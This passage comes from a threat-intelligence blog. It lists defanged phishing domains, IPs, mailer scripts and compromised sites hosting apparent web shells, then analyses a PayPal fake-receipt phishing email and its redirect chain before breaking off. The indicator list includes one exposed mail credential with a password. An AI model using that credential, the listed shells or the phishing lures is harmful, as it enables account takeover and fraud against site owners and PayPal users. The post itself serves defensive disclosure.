<span style="font-family: "arial" , "helvetica" , sans-serif;">https://twitter.com/backes_oswald</span><br />
<span style="font-family: "arial" , "helvetica" , sans-serif;">https://twitter.com/kontolklean</span><br />
<span style="font-family: "arial" , "helvetica" , sans-serif;">https://twitter.com/AHarsakti</span><br />
<br />
<b><span style="font-family: "arial" , "helvetica" , sans-serif;">Phishing Domains:</span></b><br />
<span style="font-family: "arial" , "helvetica" , sans-serif;">manageaccountclient[.]com</span><br />
<span style="font-family: "arial" , "helvetica" , sans-serif;">appleid.apple.com.login.contact-support[.]email</span><br />
<span style="font-family: "arial" , "helvetica" , sans-serif;">anakperawan[.]business</span><br />
<span style="font-family: "arial" , "helvetica" , sans-serif;">id.apple.com-en.manage.trying-verif[.]net</span><br />
<span style="font-family: "arial" , "helvetica" , sans-serif;">panca-sakti.ac.id/wp-plugin[.]php</span><br />
<span style="font-family: "arial" , "helvetica" , sans-serif;">pymntspprtverifycnt.webhop[.]me</span><br />
<span style="font-family: "arial" , "helvetica" , sans-serif;">app-idnscj-34[.]com/?16shop</span><br />
<span style="font-family: "arial" , "helvetica" , sans-serif;">updatepaymentslockaccountsprimarry.promisetcechprofile[.]com/?desacoli/?manage </span><br />
<span style="font-family: "arial" , "helvetica" , sans-serif;"></span><br />
<span style="font-family: "arial" , "helvetica" , sans-serif;">updatepaymentprifleyouraccounts.aenjay[.]com/?selimutbiru</span><br />
<span style="font-family: "arial" , "helvetica" , sans-serif;">home-pavypal.com-acknowledge[.]info</span><br />
<span style="font-family: "arial" , "helvetica" , sans-serif;">kontol.jepat.cgi-account-notification[.]ga</span><br />
<span style="font-family: "arial" , "helvetica" , sans-serif;">login-appleitunesap.servehttp[.]com</span><br />
<span style="font-family: "arial" , "helvetica" , sans-serif;">itunes-storeapple.servehttp[.]com</span><br />
<span style="font-family: "arial" , "helvetica" , sans-serif;">appleservicess-comfrimation[.]com</span><br />
<span style="font-family: "arial" , "helvetica" , sans-serif;">amazon-service-server.usa[.]cc</span><br />
<span style="font-family: "arial" , "helvetica" , sans-serif;">paypal-resolved-limited-com-ah581h8gda87weg9i8tacyuabwe.intoleratne[.]com</span><br />
<span style="font-family: "arial" , "helvetica" , sans-serif;">secure-apple.com.webapps-support-account[.]com</span><br />
<span style="font-family: "arial" , "helvetica" , sans-serif;">appleid-apple.comsign-id[.]gq</span><br />
<span style="font-family: "arial" , "helvetica" , sans-serif;">maintenance-servicesupport[.]com</span><br />
<span style="font-family: "arial" , "helvetica" , sans-serif;">secure-apple.com.maintenance-servicesupport[.]com</span><br />
<span style="font-family: "arial" , "helvetica" , sans-serif;">paypal.com-webs.app-logininformation.trying-verif[.]info</span><br />
<span style="font-family: "arial" , "helvetica" , sans-serif;">webapps-support-account[.]com</span><br />
<span style="font-family: "arial" , "helvetica" , sans-serif;">account-reportsummaryid[.]com</span><br />
<span style="font-family: "arial" , "helvetica" , sans-serif;">accountlimitedrecovery[.]com</span><br />
<span style="font-family: "arial" , "helvetica" , sans-serif;">subscription-accept[.]com</span><br />
<span style="font-family: "arial" , "helvetica" , sans-serif;">support.apple-verification.com.kuinginmencintainyatapiadaorangkedua12[.]org</span><br />
<span style="font-family: "arial" , "helvetica" , sans-serif;">accountinformationappupdate[.]ga</span><br />
<span style="font-family: "arial" , "helvetica" , sans-serif;">security-account-appleid-apple[.]com</span><br />
<span style="font-family: "arial" , "helvetica" , sans-serif;">appidaccountlaert-helpmanageupdate[.]com</span><br />
<span style="font-family: "arial" , "helvetica" , sans-serif;">paypal.com-useraccess.rabiverivcationc[.]com</span><br />
<span style="font-family: "arial" , "helvetica" , sans-serif;">payment-appleid-apple[.]store</span><br />
<span style="font-family: "arial" , "helvetica" , sans-serif;">appidaccountalert-manageupdateinfo[.]com</span><br />
<span style="font-family: "arial" , "helvetica" , sans-serif;">manage-accountv-apple[.]com</span><br />
<span style="font-family: "arial" , "helvetica" , sans-serif;">162.144.52.238</span><br />
<span style="font-family: "arial" , "helvetica" , sans-serif;">35.199.147.246</span><br />
<span style="font-family: "arial" , "helvetica" , sans-serif;">142.93.86.114</span><br />
<span style="font-family: "arial" , "helvetica" , sans-serif;">192.163.201.156</span><br />
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span>
<span style="font-family: "arial" , "helvetica" , sans-serif;"><b>Used Mailing Infrastructure:</b></span><br />
<span style="font-family: "arial" , "helvetica" , sans-serif;">www.ingemetal[.]com[.]ve/sendinbox-server.php</span><br />
<span style="font-family: "arial" , "helvetica" , sans-serif;">kamullflauge[.]com/mailer/sendinbox.php</span><br />
<span style="font-family: "arial" , "helvetica" , sans-serif;">bondiicerink[.]starsonice[.]com[.]au/tickets/sendinbox-server[.]php </span><br />
<span style="font-family: "arial" , "helvetica" , sans-serif;">bmarket[.]or[.]id/sendinbox-server[.]php</span><br />
<span style="font-family: "arial" , "helvetica" , sans-serif;">bbsp[.]co[.]id/sendinbox-server[.]php </span><br />
<span style="font-family: "arial" , "helvetica" , sans-serif;">thealmondslices[.]com/wp-content/plugins/simple/sendinbox-server[.]php</span><br />
<span style="font-family: "arial" , "helvetica" , sans-serif;">www.bang-pa[.]com/sendinbox-server[.]php</span><br />
<span style="font-family: "arial" , "helvetica" , sans-serif;">www.ingemetal[.]com[.]ve/sendinbox-server.php</span><br />
<span style="font-family: "arial" , "helvetica" , sans-serif;">http://ts666[.]tw/cgi-bin/wp-back.php</span><br />
<span style="font-family: "arial" , "helvetica" , sans-serif;">http://xn--uis74a0us56agwen8q[.]tw/cgi-bin/wp-back.php</span><br />
<span style="font-family: "arial" , "helvetica" , sans-serif;">http://xn--uis76c70xigmku7b[.]tw/cgi-bin/wp-back.php</span><br />
<span style="font-family: "arial" , "helvetica" , sans-serif;">http://ts886[.]net/cgi-bin/wp-back.php</span><br />
<span style="font-family: "arial" , "helvetica" , sans-serif;">http://xn--uisz5ba41c994d[.]com/cgi-bin/wp-back.php</span><br />
<span style="font-family: "arial" , "helvetica" , sans-serif;">http://ts5588[.]in/cgi-bin/wp-back.php</span><br />
<span style="font-family: "arial" , "helvetica" , sans-serif;">https://e-riset.litbang.kemkes[.]go[.]id/red.php?ID</span><br />
<div>
<div>
<span style="font-family: "arial" , "helvetica" , sans-serif;">transzach[.]com</span></div>
<span style="font-family: "arial" , "helvetica" , sans-serif;"><span style="font-family: "arial" , "helvetica" , sans-serif;">
</span>
</span><br />
<div>
<span style="font-family: "arial" , "helvetica" , sans-serif;">khatlon[.]tj</span><br />
<span style="font-family: "arial" , "helvetica" , sans-serif;">pbonline[.]net<br />suppoters-values[.]flights<br />thealmondslices[.]com<br />portaldosurdo[.]com<br />lagacetadelporno[.]com<br />kubotalubbock[.]net<br />devsaad[.]com</span></div>
<span style="font-family: "arial" , "helvetica" , sans-serif;">
</span>
<br />
<div>
<span style="font-family: "arial" , "helvetica" , sans-serif;"><span style="font-family: "arial" , "helvetica" , sans-serif;">ace-academy[.]org</span></span></div>
<span style="font-family: "arial" , "helvetica" , sans-serif;">
</span>
<br />
<div>
<span style="font-family: "arial" , "helvetica" , sans-serif;"><span style="font-family: "arial" , "helvetica" , sans-serif;">justessex[.]co[.]uk</span></span><br />
<span style="font-family: "arial" , "helvetica" , sans-serif;"><span style="font-family: "arial" , "helvetica" , sans-serif;">mothermyrle[.]com</span></span><br />
<span style="font-family: "arial" , "helvetica" , sans-serif;"><span style="font-family: "arial" , "helvetica" , sans-serif;">dclmhub[.]org</span></span></div>
<span style="font-family: "arial" , "helvetica" , sans-serif;">
</span>
<br />
<div>
<span style="font-family: "arial" , "helvetica" , sans-serif;"><span style="font-family: "arial" , "helvetica" , sans-serif;">soriko[.]bg</span></span><br />
<span style="font-family: "arial" , "helvetica" , sans-serif;"><span style="font-family: "arial" , "helvetica" , sans-serif;">dasgpi[.]edu[.]bd</span></span><br />
<span style="font-family: "arial" , "helvetica" , sans-serif;"><span style="font-family: "arial" , "helvetica" , sans-serif;">polresku[.]id</span></span><br />
<span style="font-family: "arial" , "helvetica" , sans-serif;"><span style="font-family: "arial" , "helvetica" , sans-serif;">app.sycamoreschool[.]com</span></span></div>
<span style="font-family: "arial" , "helvetica" , sans-serif;">
</span></div>
<span style="font-family: "arial" , "helvetica" , sans-serif;">61.19.251.44</span><br />
<span style="font-family: "arial" , "helvetica" , sans-serif;">231.100.76.32</span><br />
<span style="font-family: "arial" , "helvetica" , sans-serif;">37.59.28.24</span><br />
<span style="font-family: "arial" , "helvetica" , sans-serif;">45.64.1.58</span><br />
<span style="font-family: "arial" , "helvetica" , sans-serif;">43.250.250.62</span><br />
<span style="font-family: "arial" , "helvetica" , sans-serif;">50.87.249.80</span><br />
<span style="font-family: "arial" , "helvetica" , sans-serif;">79.124.76.95</span><br />
<span style="font-family: "arial" , "helvetica" , sans-serif;">95.142.80.3</span><br />
<span style="font-family: "arial" , "helvetica" , sans-serif;">103.15.226.230</span><br />
<span style="font-family: "arial" , "helvetica" , sans-serif;">103.247.11.50</span><br />
<span style="font-family: "arial" , "helvetica" , sans-serif;">104.20.155.77</span><br />
<span style="font-family: "arial" , "helvetica" , sans-serif;">104.238.117.234</span><br />
<span style="font-family: "arial" , "helvetica" , sans-serif;">108.167.180.222</span><br />
<span style="font-family: "arial" , "helvetica" , sans-serif;">162.241.230.74</span><br />
<span style="font-family: "arial" , "helvetica" , sans-serif;">162.241.217.60</span><br />
<span style="font-family: "arial" , "helvetica" , sans-serif;">186.202.153.58</span><br />
<span style="font-family: "arial" , "helvetica" , sans-serif;">173.236.169.164</span><br />
<span style="font-family: "arial" , "helvetica" , sans-serif;">182.70.240.119</span><br />
<span style="font-family: "arial" , "helvetica" , sans-serif;">192.95.11.64</span><br />
<span style="font-family: "arial" , "helvetica" , sans-serif;">192.163.208.222</span><br />
<span style="font-family: "arial" , "helvetica" , sans-serif;">132.148.154.122</span><br />
<span style="font-family: "arial" , "helvetica" , sans-serif;">205.178.189.131</span><br />
<span style="font-family: "arial" , "helvetica" , sans-serif;">202.70.136.137</span><br />
<span style="font-family: "arial" , "helvetica" , sans-serif;">204.197.252.169</span><br />
<span style="font-family: "arial" , "helvetica" , sans-serif;">217.182.113.29</span><br />
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span><span style="font-family: "arial" , "helvetica" , sans-serif;"><b>Compromised Websites Shared By the Group:</b></span><br />
<span style="font-family: "arial" , "helvetica" , sans-serif;">countdown-showband[.]de//images/jsspwneed.png</span><br />
<span style="font-family: "arial" , "helvetica" , sans-serif;">http://www.adslaminar[.]com//images/jdownloads/screenshots/jsspwned.png</span><br />
<span style="font-family: "arial" , "helvetica" , sans-serif;">http://www.psp2.radom[.]pl//images/jdownloads/screenshots/jsspwned.png</span><br />
<span style="font-family: "arial" , "helvetica" , sans-serif;">http://www.argonrostov[.]ru//images/jsspwneed.php</span><br />
<span style="font-family: "arial" , "helvetica" , sans-serif;">http://www.oplus-conseil[.]fr//images/jsspwneed.php</span><br />
<span style="font-family: "arial" , "helvetica" , sans-serif;">http://china.lanfa.com[.]tw//images/jsspwneed.php</span><br />
<span style="font-family: "arial" , "helvetica" , sans-serif;">http://www.emgiasa[.]es//images/jsspwneed.php</span><br />
<span style="font-family: "arial" , "helvetica" , sans-serif;">http://www.oplus-conseil[.]fr//images/jsspwneed.php</span><br />
<span style="font-family: "arial" , "helvetica" , sans-serif;">http://china.lanfa.com[.]tw//images/jsspwneed.php</span><br />
<span style="font-family: "arial" , "helvetica" , sans-serif;">http://www.emgiasa[.]es//images/jsspwneed.php</span><br />
<span style="font-family: "arial" , "helvetica" , sans-serif;">http://www.gammi-ltd[.]ru//images/jsspwneed.php</span><br />
<span style="font-family: "arial" , "helvetica" , sans-serif;">http://focusmobi.com[.]br//wp-content/plugins/revslider/temp/update_extract/revslider/jsspwned.php</span><br />
<span style="font-family: "arial" , "helvetica" , sans-serif;">http://syaden[.]net//images/jdownloads/screenshots/jsspwned.png</span><br />
<span style="font-family: "arial" , "helvetica" , sans-serif;">http://vanguardacademy-ng[.]com//sites/default/files/jsspwnx.php</span><br />
<span style="font-family: "arial" , "helvetica" , sans-serif;">mail.kingacreative[.]com|info@kingacreative.com|123123</span><br />
<span style="font-family: "arial" , "helvetica" , sans-serif;">http://www.aytobareyo[.]org/sites/default/files/jsspwnx.php</span><br />
<span style="font-family: "arial" , "helvetica" , sans-serif;">http://www.technikus[.]pl//images/jsspwneed.php</span><br />
<span style="font-family: "arial" , "helvetica" , sans-serif;">http://devsaad[.]com/sites/default/files/jsspwnx.php</span><br />
<span style="font-family: "arial" , "helvetica" , sans-serif;">http://certusprocess[.]com//images/jsspwned.php</span><br />
<span style="font-family: "arial" , "helvetica" , sans-serif;">http://www.limontech[.]pl//images/jsspwneed.php</span><br />
<span style="font-family: "arial" , "helvetica" , sans-serif;">http://gemilangasia[.]com//wp-content/plugins/revslider/temp/update_extract/revslider/jsspwned.php</span><br />
<span style="font-family: "arial" , "helvetica" , sans-serif;">http://www.colegioserecrescer.com.br//wp-content/plugins/cherry-plugin/admin/import-export/jsspwned.php</span><br />
<span style="font-family: "arial" , "helvetica" , sans-serif;">http://www.jardimexpress.com[.]br//wp-content/plugins/cherry-plugin/admin/import-export/jsspwned.php</span><br />
<span style="font-family: "arial" , "helvetica" , sans-serif;">http://vykopatkolodec[.]ru//wp-content/themes/Avada/framework/plugins/revslider/temp/update_extract/revslider/jsspwned.php</span><br />
<span style="font-family: "arial" , "helvetica" , sans-serif;">*Currently unconfirmed if being used by the group.</span><br />
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span>Andrei Kornevhttp://www.blogger.com/profile/11381063307200503085noreply@blogger.com1tag:blogger.com,1999:blog-74827929652568895.post-60738071188173904642018-07-20T14:56:00.000-04:002018-07-28T09:37:19.723-04:00Uncovering A PayPal Phishing Campaign<div dir="ltr" style="text-align: left;" trbidi="on">
<span style="white-space: pre-wrap;"><span style="font-family: "arial" , "helvetica" , sans-serif;">While browsing the DC9723 group, we stumbled on a screenshot which one its group's members had just shared with the rest of the DefCon group. </span></span><span style="font-family: "arial" , "helvetica" , sans-serif; white-space: pre-wrap;">The group member had received what he claimed was a PayPal phishing email. He claimed he had received it in the previous day (July 14th) and that it contained a fake receipt for a purchase he had never made from an alleged Italian internet hosting company. </span><br />
<span style="font-family: "arial" , "helvetica" , sans-serif; white-space: pre-wrap;"><br /></span>
<span style="font-family: "arial" , "helvetica" , sans-serif; white-space: pre-wrap;">When we looked into this "Aruba IT" company - we saw that it actually was a legitimate internet hosting and domain registration company based out of Italy. </span><br />
<span style="font-family: "arial" , "helvetica" , sans-serif; white-space: pre-wrap;">Which raised our curiosity to further look into the email itself and see if anything else could be recovered that points to any clues to this campaign, who else might be being used as a front, and if we can identify any malicious activity.</span><br />
<span style="font-family: "arial" , "helvetica" , sans-serif; white-space: pre-wrap;"><br /></span>
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><span style="font-family: "arial" , "helvetica" , sans-serif;"><img alt="37219197_10156461903061894_5675719665855234048_o" height="548" src="https://lh4.googleusercontent.com/yNJCPdXhOsAAw_W-hCXiffsDTra4_65Ctzy8ce_IlPnTsWWVbvVeU37fGkihKojjY82PiJvNChcFVN4bgxM8UlFiiIHS15HNzFqJ_M7Eqc9pOD09ZVJPv-JpyuMjj6i9lALM_gXV" style="border: none; margin-left: auto; margin-right: auto; transform: rotate(0rad);" width="640" /></span></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><span style="font-family: "arial" , "helvetica" , sans-serif; font-size: small;">The screenshot shared by the DC9723 user.</span></td></tr>
</tbody></table>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; font-style: normal; font-variant: normal; font-weight: 700; text-decoration-skip-ink: none; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap;"><span style="font-family: "arial" , "helvetica" , sans-serif; font-size: medium;">Fake Receipt Phishing</span></span><br />
<span style="font-family: "arial" , "helvetica" , sans-serif; white-space: pre-wrap;"><br /></span>
<span style="font-family: "arial" , "helvetica" , sans-serif; white-space: pre-wrap;">By using a fake receipt like this, an attacker wishes to alarm that a substantial purchase had just been made in the recipient's name. Hoping such a message will motivate the recipient into taking action where a more traditional phishing email might not. </span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span style="font-family: "arial" , "helvetica" , sans-serif;">The attacker in this case copied the main PayPal template for electronic receipts, by doing so the attacker wishes to scare the recipient into logging into the PayPal site and give away their credentials. </span></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: "arial" , "helvetica" , sans-serif;"><span style="background-color: transparent; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">Conveniently so, as seen in the above screenshot, a line which isn't present in a real PayPal receipt had been added -</span></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: "arial" , "helvetica" , sans-serif;"><span style="background-color: transparent; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"> " </span><span style="background-color: transparent; font-style: italic; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">You don't recognize this transaction</span><span style="background-color: transparent; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;">? " </span></span><span style="font-family: "arial" , "helvetica" , sans-serif; white-space: pre-wrap;">with an embedded link that can be seen at the bottom of the email.</span></div>
<span style="font-family: "arial" , "helvetica" , sans-serif; white-space: pre-wrap;"><br /></span>
<span style="font-family: "arial" , "helvetica" , sans-serif; white-space: pre-wrap;">In all probability, this had been added to further guide the potential target along the attacker's desired path of action in which he'd like him to take; and it serves as correlated pretext to resolve this supposed receipt misunderstanding. </span><br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span style="font-family: "arial" , "helvetica" , sans-serif;">Upon a further look, we can also see this email contains some spelling mistakes and mistyped numbers. Perhaps intentional to add a state of confusion to the already dire financial situation the target could feel he is in, and an even further sense of urgency to resolve this whole issue. </span></span><span style="font-family: "arial" , "helvetica" , sans-serif; white-space: pre-wrap;">Or more likely this just means that this was recompiled in haste. </span></div>
<span style="font-family: "arial" , "helvetica" , sans-serif; white-space: pre-wrap;"><br /></span>
<span style="font-family: "arial" , "helvetica" , sans-serif; white-space: pre-wrap;">The reply emails: </span><b style="font-family: arial, helvetica, sans-serif; white-space: pre-wrap;">receipt@intl.paypai.com</b><span style="font-family: "arial" , "helvetica" , sans-serif; white-space: pre-wrap;">, </span><b style="font-family: arial, helvetica, sans-serif; white-space: pre-wrap;">noreply@intl.pavpal.com</b><span style="font-family: "arial" , "helvetica" , sans-serif; white-space: pre-wrap;"> stand out as obvious spoofs. </span><br />
<span style="font-family: "arial" , "helvetica" , sans-serif; white-space: pre-wrap;"><br /></span>
<span style="font-family: "arial" , "helvetica" , sans-serif; vertical-align: baseline; white-space: pre-wrap;"><u>pavpal[.]com</u></span><span style="font-family: "arial" , "helvetica" , sans-serif; vertical-align: baseline; white-space: pre-wrap;"> had been seen in old phishing activity in the past and had since been registered by the actual PayPal company in probable efforts of blocking this type of activity. </span><br />
<span style="font-family: "arial" , "helvetica" , sans-serif; vertical-align: baseline; white-space: pre-wrap;"><u>paypai[.]com</u></span><span style="font-family: "arial" , "helvetica" , sans-serif; vertical-align: baseline; white-space: pre-wrap;"> had also been observed in numerous scamming attempts and phishing campaigns with its domain belonging to Moniker Online Services.</span><br />
<ul>
<li><span style="font-family: "arial" , "helvetica" , sans-serif;"><a href="https://myonlinesecurity.co.uk/fake-paypal-your-account-has-been-limited-leads-to-a-money-making-scam/">https://myonlinesecurity.co.uk/fake-paypal-your-account-has-been-limited-leads-to-a-money-making-scam/</a></span></li>
</ul>
<ul>
<li><span style="font-family: "arial" , "helvetica" , sans-serif;"><a href="https://www.paypal-community.com/t5/PayPal-Basics/Spoof-Phishing-Emails-Tips-on-how-to-identify-amp-stay-protected/td-p/628490/page/5">https://www.paypal-community.com/t5/PayPal-Basics/Spoof-Phishing-Emails-Tips-on-how-to-identify-amp-stay-protected/td-p/628490/page/5</a></span></li>
</ul>
<span style="font-family: "arial" , "helvetica" , sans-serif;">Both are widely reported websites. This makes arriving to the conclusion if this attacker actually has current control of these email boxes very hard.</span><br />
<div dir="ltr" style="text-align: left;" trbidi="on">
<span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span></div>
<div dir="ltr" style="text-align: left;" trbidi="on">
<span style="font-family: "arial" , "helvetica" , sans-serif; white-space: pre-wrap;">The embedded link to the fake PayPal resolution center this attacker chose to use was </span></div>
<div dir="ltr" style="text-align: left;" trbidi="on">
<span style="font-family: "arial" , "helvetica" , sans-serif; white-space: pre-wrap;">based on Twitter's link shortener:</span></div>
<div dir="ltr" style="text-align: left;" trbidi="on">
<ul>
<li><span style="font-family: "arial" , "helvetica" , sans-serif;">t[.]co/Tv5Zo3ig7v</span></li>
</ul>
</div>
<div dir="ltr" style="text-align: left;" trbidi="on">
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; font-style: normal; font-variant: normal; font-weight: 400; text-decoration-skip-ink: none; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap;"><span style="font-family: "arial" , "helvetica" , sans-serif;">Taking a peek at the link and looking at its redirect chain:</span></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; font-style: normal; font-variant: normal; font-weight: 400; text-decoration-skip-ink: none; text-decoration: underline; vertical-align: baseline; white-space: pre-wrap;"><span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span></span></div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><span style="font-family: "arial" , "helvetica" , sans-serif;"><img alt="redirect" height="185" src="https://lh6.googleusercontent.com/beqMf4iYfQyi3XG-C44mNkVyFOQGDFFyOXwclElxzgNESx8PgS99tn8snYUDzw1l3o6gOoJed2bmliXxVGXg9oP7b2ucRC1qKVAPH9ThxY3_OJk-LSiP_Xz5kkj5p2k8AzphJJHR" style="border: none; margin-left: auto; margin-right: auto; transform: rotate(0rad);" width="624" /></span></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><span style="font-family: "arial" , "helvetica" , sans-serif; font-size: small;">Source: urlscan.io</span></td></tr>
</tbody></table>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span style="font-family: "arial" , "helvetica" , sans-serif;">We can identify that the actual target domain was paypa[.]com-verifyseeds[.]support</span></span><br />
<span style="background-color: transparent; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span style="font-family: "arial" , "helvetica" , sans-serif;"><br /></span></span></div>
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><span style="font-family: "arial" , "helvetica" , sans-serif;"><img height="457" src="https://lh4.googleusercontent.com/lNpCi-7KAk1FHILN-1rMyUNaX0k_tCgLXNAmSd-_-4lXaz3D6iztodke1aKs58087pBsXeFYks0_EYU4tCgDmH4ax2aJXRe-ti00YiUJ5sjLZpFVjf_CF4AKtaufX1Zz7R4ehKcU" style="border: none; margin-left: auto; margin-right: auto; transform: rotate(0rad);" width="624" /></span></td></tr>
<tr><td class="tr-caption" style="text-align: center;"><span style="font-family: "arial" , "helvetica" , sans-serif; font-size: small;">Source: urlscan.io</span></td></tr>
</tbody></table>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="font-family: "arial" , "helvetica" , sans-serif; white-space: pre-wrap;">By searching for similar pages based on the resource path we could identify similar domains being used in the past two weeks:</span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
</div>
<div style="text-align: left;">
<ul>
<li><span style="font-family: "arial" , "helvetica" , sans-serif;">paypal[.]com-webapps[.]site</span></li>
<li><span style="font-family: "arial" , "helvetica" , sans-serif;">paypal[.]com-webappsinfo[.]reviews</span></li>
<li><span style="font-family: "arial" , "helvetica" , sans-serif;">paypa[.]com.lakukerascok[.]com</span></li>
<li><span style="font-family: "arial" , "helvetica" , sans-serif;">paypal.com[.]accountinfoverifysupport[.]info</span></li>
<li><span style="font-family: "arial" , "helvetica" , sans-serif;">paypal[.]com-accountverify[.]support</span></li>
<li><span style="font-family: "arial" , "helvetica" , sans-serif;">paypal.accountinfoverify[.]support</span></li>
<li><span style="font-family: "arial" , "helvetica" , sans-serif;">paypa[.]com-verifyseeds[.]support</span></li>
<li><span style="font-family: "arial" , "helvetica" , sans-serif;">paypal[.]com-verifyaccount[.]center/ </span></li>
<li><span style="font-family: "arial" , "helvetica" , sans-serif;">paypal[.]com-accountservice[.]info</span></li>
</ul>
</div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span style="font-family: "arial" , "helvetica" , sans-serif;">Along with the following redirects:</span></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
</div>
<ul>
<li><span style="font-family: "arial" , "helvetica" , sans-serif;">t[.]co-d3gbfd[.]city</span></li>
<li><span style="font-family: "arial" , "helvetica" , sans-serif;">t.co-d3gbfd[.]city/147/</span></li>
<li><span style="font-family: "arial" , "helvetica" , sans-serif;">huit[.]re/tettew</span></li>
<li><span style="font-family: "arial" , "helvetica" , sans-serif;">huit[.]re/shrt</span></li>
<li><span style="font-family: "arial" , "helvetica" , sans-serif;">huit[.]re/_Ebfo0oe</span></li>
<li><span style="font-family: "arial" , "helvetica" , sans-serif;">xt[.]lv/XJiEa</span></li>
<li><span style="font-family: "arial" , "helvetica" , sans-serif;">alif[.]idseedapp[.]in</span></li>
<li><span style="font-family: "arial" , "helvetica" , sans-serif;">huit[.]re/webappss</span></li>
<li><span style="font-family: "arial" , "helvetica" , sans-serif;">kuntulmaju[.]ml/cuk </span></li>
<li><span style="font-family: "arial" , "helvetica" , sans-serif;">huit[.]re/satumilyar</span></li>
<li><span style="font-family: "arial" , "helvetica" , sans-serif;">1.googleincsafe[.]org/brinjilan</span></li>
</ul>
<ul>
<li><span style="font-family: "arial" , "helvetica" , sans-serif;">https://ok[.]ru/dk?cmd=logExternal&st.cmd=logExternal&st.link=https%3A%2F%2Ft.co-d3gbfd.city%2F403&st.name=externalLinkRedirect&st.tid=68566299896757</span></li>
<li><span style="font-family: "arial" , "helvetica" , sans-serif;">https://ok[.]ru/dk?cmd=logExternal&st.cmd=logExternal&st.link=http://1.googleincsafe.org/kntlogeseng&st.name=externalLinkRedirect&st.tid=68261099042173&st._aid=WideFeed_openLink</span></li>
</ul>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span style="font-family: "arial" , "helvetica" , sans-serif;">Based on these different redirects made us suspect a phishing kit was being used here and spread during these couple of weeks. </span></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span style="font-family: "arial" , "helvetica" , sans-serif;">The live domain which is currently still live and being used through the redirection chain is:</span></span></div>
<blockquote class="tr_bq" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span style="font-family: "arial" , "helvetica" , sans-serif;">t<span style="white-space: normal;">[.]</span>co-d3gbfd<span style="white-space: normal;">[.]</span>city/147/</span></span></blockquote>
<br />
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre-wrap;"><span style="font-family: "arial" , "helvetica" , sans-serif;">Which can be seen redirecting us to paypal.com-signinaccountsafe.info/stylec0de</span></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; font-style: normal; font-variant: normal; vertical-align: baseline; white-space: pre-wrap;"><span style="font-family: "arial" , "helvetica" , sans-serif;"><u>www.paypa</u><span style="white-space: normal;">[.]</span><u>com-verifyseeds</u><span style="white-space: normal;">[.]</span><u>support </u>- the redirection domain from our screenshot</span></span></div>
<div dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;">
